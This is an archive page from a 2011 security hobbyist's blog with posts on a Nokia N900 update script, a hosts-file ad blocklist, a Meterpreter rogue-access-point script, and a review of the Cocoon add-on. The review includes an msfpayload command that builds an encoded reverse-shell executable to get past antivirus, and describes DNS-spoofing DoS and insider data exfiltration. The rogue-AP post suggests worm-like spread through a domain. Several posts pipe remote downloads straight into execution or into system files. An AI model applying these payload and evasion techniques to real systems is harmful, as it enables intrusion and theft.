Archive for 2011

A Note on Updating Weaponized Nokia N900s

by on Dec.17, 2011, under Code, Posts

I wanted to make this post to save time and headaches for people who own ‘weaponized’ Nokia N900s.

If you regularly update your Nokia N900 by doing (as root):

apt-get update && apt-get upgrade -y

I have ran into some issues with some of the newer packages.

Firstly, the newest beta version of nmap (5.59BETA1_armel) appears to be buggy enough to the point where it’s almost unusable.

Running this:
nmap -sS -P0 -vv www.google.com -p 80

Yields:
Starting Nmap 5.59BETA1 (http://nmap.org) at 2011-12-17 21:14 EST
Warning Hostname www.google.com resolves to 6 IPs. Using 74.125.45.147
route_dst_netlink: can’t find interface “wlan0”

Secondly, subversion (svn) gets completely broken due to a library compatibility issue:

svn -h
Segmentation fault

There has been discussion on this: http://talk.maemo.org/showthread.php?p=970467

Having svn broken really stinks, because then I am not able to update Metasploit. Who in the hell wants to run an outdated version of Metasploit? (I imagine there are some people..)

To work around this for the time being I have crafted the following shell script:

#!/bin/bash

if [ ${#} -lt 1 ]
 then
   echo "Usage:	"
   echo "./update.sh normal #This just does a normal update";
   echo "./update.sh modded #This will do a normal update and then downgrade libaprutil1, libapr1 and nmap so that they work";
   exit 1;
fi

if echo ${1} | egrep "normal"  > /dev/null;
 then
   apt-get update;
   apt-get upgrade -y;
   exit 0;
elif echo ${1} | egrep "modded"  > /dev/null;
 then
   apt-get update;
   apt-get upgrade -y;
   apt-get install nmap=5.50-2 libaprutil1=1.3.9-2 libapr1=1.4.2-1 --force-yes -y;
   apt-get clean && apt-get autoclean;
   exit 0;
else
   echo "I don't know what you are trying to do.." #Thanks Arc
   exit 2;
fi

http://zitstif.no-ip.org/update.txt
SHA1 (update.txt) = d83306d18a146a54a38ea236e3a236b4955bb81b

For the time being if you’re in a similar case like me, you’ll have to use this shell script (wget http://zitstif.no-ip.org/update.sh &&  chmod +x update.sh && ./update.sh modded).

15 Comments :, , , , , , , , , , , , , , more...

THELIST.txt update (THENEWLIST.txt)

by on Dec.17, 2011, under Posts

In this post I am simply  doing an update to the ‘THELIST.txt’ file which is essentially a blacklist of web servers that are ad servers or have been found to be malicious. I have added more servers (mostly ad web servers). The file is accessible here:

http://zitstif.no-ip.org/THENEWLIST.txt
SHA1 (THENEWLIST.txt) = 02a2e93167f680a09f5047ef1b081483b680bfde

You can then download this file and append the output of ‘THENEWLIST.txt” to your hosts file.

For Microsoft Windows you will most likely have to do the following:

1.) iexplore http://zitstif.no-ip.org/THENEWLIST.txt
2.) Save the file to a location
3.) Run CMD.exe as an Administrator
4.) ‘cd’ to the directory where you saved ‘THENEWLIST.txt’
5.) Execute the following command: attrib -R C:\WINDOWS\system32\drivers\etc\hosts
6.) Then execute this command: type THENEWLIST.txt >> C:\WINDOWS\system32\drivers\etc\hosts
7.) Execute the following command: attrib +R C:\WINDOWS\system32\drivers\etc\hosts

For *nix hosts do:

1.) Gain root via: su or sudo -i
2.) chmod a+rw /etc/hosts
3.) printf “GET /THENEWLIST.txt HTTP/1.0\n\r\n” | nc -vv zitstif.no-ip.org 80 2>&1 | egrep -v ‘HTTP|Apache|Date:|ETag:|Accept-Ranges:|Content-|Connection:|Modified:|Connection’  >> /etc/hosts
4.) chmod a+r/etc/hosts && chmod a-w /etc/hosts

I hope this is useful to you. I think most people would like nearly ad free web browsing.  In addition to that, legitimate ad servers have been known to serve up malware:

http://news.cnet.com/8301-27080_3-20000898-245.html

So by using this file in tandem with the Adblock extension/plugin you can get for Firefox/Google-Chrome, you will be less annoyed by ads and not have to be too concerned about ads serving up malware for you.

If you have any questions, comments, or concerns feel free to contact me.

Leave a Comment :, , , , , , , , , , , , , , , , , , , , more...

Meterpreter script – rogueap.rb – Abusing Windows Virtual Wireless NIC Feature

by on Oct.08, 2011, under Meterpreter Scripts, Posts

I found myself inspired by Vivek Ramachandran‘s videos, I thought I would take the honor in creating the simple meterpreter script that basically does what you see in the third installation of the Swse Addendum videos.

When I watched the third video I thought to myself, “This shouldn’t be too difficult to do”. From my perception, I think that Vivek was kind of hinting that he might have wanted to see someone in the info-sec community create a meterpreter script that does what you see in this video. I was glad to do this. 🙂

For penetration testers, this script means that they can now more easily setup rogue wireless access points by utilizing this script, that utilizes the soft ap feature that is implemented into Windows 7 and Windows 2008.

If the victim computers are part of a Windows domain and have wireless NICs, by automating Metasploit with a pass-the-hash attack and using my script, one could essentially automate deploying a series of rogue ap points throughout a domain. This would be kind of like a network worm.

If you’re curious about automating Metasploit, please see:

http://dev.metasploit.com/redmine/projects/framework/repository/revisions/8878/entry/documentation/msfconsole_rc_ruby_example.rc

My script gives the end user the option if they want to install the meterpreter service on the victim computer. I thought that giving this option would be ideal for if the victim computer ends up rebooting. If you were just to deploy the soft AP and run a binding payload, the binding payload most likely wouldn’t survive a reboot.

The script is available here:

http://zitstif.no-ip.org/meterpreter/rogueap.rb

http://zitstif.no-ip.org/meterpreter/rogueap.txt

If you have any issues and you need help, feel free to contact me. Additionally, don’t hesitate to modify the script if you need/want to do so.

2 Comments :, , , , , , , , , , , , , , , , , , , , , , more...

Firefox Add-On Cocoon – Its strengths and weaknesses

by on Sep.24, 2011, under Posts

What is Cocoon? According to https://getcocoon.com/support/faq, it is:

Cocoon is a service that protects your computer and your privacy when you are on the Internet. It’s a virus-free, secure, and private web experience. We shield your computer from the bad guys, and we protect your identity from prying eyes. It’s that simple.

I would like to argue how ‘secure’ Cocoon is, but year after year, I think most information security specialists would agree that most things aren’t necessarily 100% secure. Semantics aside, I am still relatively impressed with this Firefox add-on, which can be obtained here.

Strengths of Cocoon:

Using tools like ettercap, sslstrip, webmitm, dnsspoof, and wireshark, I was not able to retrieve the login credentials that were used to sign on to Cocoon’s privacy service. The way they have implemented SSL with this plugin is probably one of the best SSL implementations I’ve seen in my humble opinion. (Although, it does use TLS version 1, which I think you should read about here.)

Even using webmitm and creating a self signed certificate pretty identical to the one that *.vworldc.com used, I was not able to log in to the service and I received this error message:

Cocoon Cert Error

The implementation of SSL that the Cocoon developers have used is simply wonderful. For people who are on the road and have to bear using public wifi on a regular basis and don’t have access to a VPN server or using a socks5 proxy server via SSH, I believe that using HTTPS Everywhere and Cocoon in tandem would be a great defense against attackers who are on the same network.

Weaknesses of Cocoon:

Cocoon’s proxy service has an AV solution implemented. For instance, when you go to download an executable file when you’re using Cocoon, you will be prompted that the file has either passed the virus scan or hasn’t. In the case of if it has passed the scan, you are still given a warning about what kind of file it is. If the file has failed the AV scan, you won’t be able to download the file while using Cocoon.

With that being said, I thought I would put Cocoon’s AV solution to the test. Firstly, I tried accessing a benign but universally known ‘virus’ file that triggers all AV solutions:

http://www.eicar.org/download/eicar.com

Not so surprisingly, this file was flagged and I was warned. My next test was to try a meterpreter PE hosted on my own website, which I created using:

msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=443 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 -o test.exe

(prior to running this string, I ran msfupdate of course). To my surprise, this file passed the AV scan done by Cocoon’s AV services. My next test was done using no encoders and yet again this passed the AV scan provided by Cocoon!

I even tried sbd.exe which is in the /pentest/windows-binaries/tools directory of BackTrack without modifying the file, yet it still passed Cocoon’s AV solution.

With Linux and OSX payloads from the Metasploit project, they passed the AV solution as well, but I was still warned that they were executable. Other file types that can trigger Cocoon’s AV solution are zip and tar.gz files. Yet .rar files triggered no alerts or prompts.

We shield your computer from the bad guys”, pertaining to AV solutions, this is where Cocoon falls extremely short.

Network attacks against Cocoon:

As of the moment, the only attack I could do against Cocoon was a DOS attack. I simply used dnsspoof or ettercap (and the dns_spoof plugin)  and setup a hosts file with *.vworldc.com pointing to my IP address or a non-existing one.

What this means is that someone who’s in the same network as me and if I know they use Cocoon, I could do a DOS attack against them so they cannot access Cocoon’s services and then they would be forced to access the web ‘naked’.

Offensive uses of Cocoon:

One could use Cocoon for ex-filtrating data out of an organization to a foreign entity. For instance, if I’m agitated employee X at employer Y, I could install and use Cocoon to e-mail an attachment containing company private information to an out of jurisdiction web server.

Closing Words:

For those of you who people come to for information security related solutions, I would highly recommend that you check this Firefox add-on. As of the moment, it is free and free to use their service. Weaknesses aside, I still believe that this is a great defensive tool.

5 Comments :, , , , , , , , , , , , , , , , , , , , , , , , more...

Update in regards to my current situation

by on Sep.05, 2011, under Posts

To my current readers/followers:

I appreciate the e-mails and feedback that I have been receiving from you all. It is a great source of motivation for me, especially being a person like myself who is quite pessimistic and feels inadequate.

My next post may not be for another month or so. This is due to the fact that my main computer that I use for programming and virtual machines, is having instability issues with the SATA/RAID controller. (I will most likely have to get a new motherboard.) It’s a good thing that I’m relatively anal retentive about doing backups.

One other hindrance to my posting, is the fact that I’m back in school this fall and will have less time to work on my info sec projects.

With that being said, feel free to drop me an e-mail or comment if you desire to do so. 🙂

FYI, if you live in the midwest like myself and would like to possibly meet up, I will be attending GrrCon since it is in my hometown. It will take place all day September 16, 2011.

Visit: http://grrcon.org for more information and pricing.

Leave a Comment :, , , , , , , , , , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!